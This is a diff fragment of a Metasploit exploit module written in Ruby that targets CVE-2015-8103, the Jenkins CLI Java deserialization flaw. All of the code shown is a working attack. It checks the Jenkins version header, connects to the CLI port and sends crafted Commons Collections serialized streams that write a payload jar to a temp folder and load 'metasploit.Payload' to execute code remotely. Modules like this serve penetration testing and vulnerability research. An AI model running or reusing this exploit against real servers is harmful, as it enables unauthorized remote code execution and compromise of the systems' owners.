+          [
+            ['CVE', '2015-8103'],
+            ['URL', 'https://github.com/foxglovesec/JavaUnserializeExploits/blob/master/jenkins.py'],
+            ['URL', 'https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections1.java'],
+            ['URL', 'http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability'],
+            ['URL', 'https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-11-11']
+          ],
+      'Platform'       => 'java',
+      'Arch'           => ARCH_JAVA,
+      'Targets'        =>
+        [
+          [ 'Jenkins 1.637', {} ]
+        ],
+      'DisclosureDate' => 'Nov 18 2015',
+      'DefaultTarget' => 0))
+
+    register_options([
+      OptString.new('TEMP', [true, 'Folder to write the payload to', '/tmp']),
+      Opt::RPORT('8080')
+    ], self.class)
+  end
+
+  def exploit
+    unless vulnerable?
+      fail_with(Failure::Unknown, "#{peer} - Jenkins is not vulnerable, aborting...")
+    end
+    invoke_remote_method(set_payload)
+    invoke_remote_method(class_load_payload)
+  end
+
+  def check
+    result = Exploit::CheckCode::Safe
+
+    if vulnerable?
+      result = Exploit::CheckCode::Vulnerable
+    end
+
+    result
+  end
+
+  def vulnerable?
+    http_headers = send_request_cgi({'uri' => '/'}).headers
+    if http_headers['X-Jenkins'].to_f <= 1.637
+      @jenkins_cli_port = http_headers['X-Jenkins-CLI-Port'].to_i
+      return true
+    end
+
+    false
+  end
+
+  # Connects to the server, creates a request, sends the request,
+  # reads the response
+  #
+  # Passes +opts+ through directly to Rex::Proto::Http::Client#request_cgi.
+  #
+  def send_request_cgi(opts={}, timeout = 20)
+    if datastore['HttpClientTimeout'] && datastore['HttpClientTimeout'] > 0
+      actual_timeout = datastore['HttpClientTimeout']
+    else
+      actual_timeout =  opts[:timeout] || timeout
+    end
+
+    begin
+      c = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'])
+      c.connect
+      r = c.request_cgi(opts)
+      c.send_recv(r, actual_timeout)
+    rescue ::Errno::EPIPE, ::Timeout::Error
+      nil
+    end
+  end
+
+  def invoke_remote_method(serialized_java_stream)
+    begin
+      socket = connect(true, {'RPORT' => @jenkins_cli_port})
+
+      print_status 'Sending headers...'
+      socket.put(read_bin_file('serialized_jenkins_header'))
+
+      vprint_status(socket.recv(1024))
+      vprint_status(socket.recv(1024))
+
+      encoded_payload0 = read_bin_file('serialized_payload_header')
+      encoded_payload1 = Rex::Text.encode_base64(serialized_java_stream)
+      encoded_payload2 = read_bin_file('serialized_payload_footer')
+
+      encoded_payload = "#{encoded_payload0}#{encoded_payload1}#{encoded_payload2}"
+      print_status "Sending payload length: #{encoded_payload.length}"
+      socket.put(encoded_payload)
+    ensure
+      disconnect(socket)
+    end
+
+  end
+
+  def print_status(msg='')
+    super("#{rhost}:#{rport} - #{msg}")
+  end
+
+  #
+  # Serialized stream generated with:
+  # https://github.com/dmohanty-r7/ysoserial/blob/stager-payloads/src/main/java/ysoserial/payloads/CommonsCollections3.java
+  #
+  def set_payload
+    stream = Rex::Java::Serialization::Model::Stream.new
+
+    handle = File.new(File.join( Msf::Config.data_directory, "exploits", "CVE-2015-8103", 'serialized_file_writer' ), 'rb')
+    decoded = stream.decode(handle)
+    handle.close
+
+    inject_payload_into_stream(decoded).encode
+  end
+
+  #
+  # Serialized stream generated with:
+  # https://github.com/dmohanty-r7/ysoserial/blob/stager-payloads/src/main/java/ysoserial/payloads/ClassLoaderInvoker.java
+  #
+  def class_load_payload
+    stream = Rex::Java::Serialization::Model::Stream.new
+    handle = File.new(File.join( Msf::Config.data_directory, 'exploits', 'CVE-2015-8103', 'serialized_class_loader' ), 'rb')
+    decoded = stream.decode(handle)
+    handle.close
+    inject_class_loader_into_stream(decoded).encode
+  end
+
+  def inject_class_loader_into_stream(decoded)
+    file_name_utf8 = get_array_chain(decoded)
+                         .values[2]
+                         .class_data[0]
+                         .values[1]
+                         .values[0]
+                         .values[0]
+                         .class_data[3]
+    file_name_utf8.contents = get_random_file_name
+    file_name_utf8.length = file_name_utf8.contents.length
+    class_name_utf8 = get_array_chain(decoded)
+                          .values[4]
+                          .class_data[0]
+                          .values[0]
+    class_name_utf8.contents = 'metasploit.Payload'
+    class_name_utf8.length = class_name_utf8.contents.length
+    decoded
+  end
+
+  def get_random_file_name
+    @random_file_name ||= "#{Rex::FileUtils.normalize_unix_path(datastore['TEMP'], "#{rand_text_alpha(4 + rand(4))}.jar")}"
+  end
+
+  def inject_payload_into_stream(decoded)
+    byte_array = get_array_chain(decoded)
+                     .values[2]
+                     .class_data
+                     .last
+    byte_array.values = payload.encoded.bytes
+    file_name_utf8 = decoded.references[44].class_data[0]
+    rnd_fname = get_random_file_name
+    register_file_for_cleanup(rnd_fname)
+    file_name_utf8.contents = rnd_fname
+    file_name_utf8.length = file_name_utf8.contents.length
+    decoded
+  end
+
+  def get_array_chain(decoded)
+    object = decoded.contents[0]
+    lazy_map = object.class_data[1].class_data[0]
+    chained_transformer = lazy_map.class_data[0]
+    chained_transformer.class_data[0]
+  end
+
+  def read_bin_file(bin_file_path)
+    data = ''
+
+    File.open(File.join( Msf::Config.data_directory, "exploits", "CVE-2015-8103", bin_file_path ), 'rb') do |f|
+      data = f.read
+    end
+
+    data
+  end
+
+end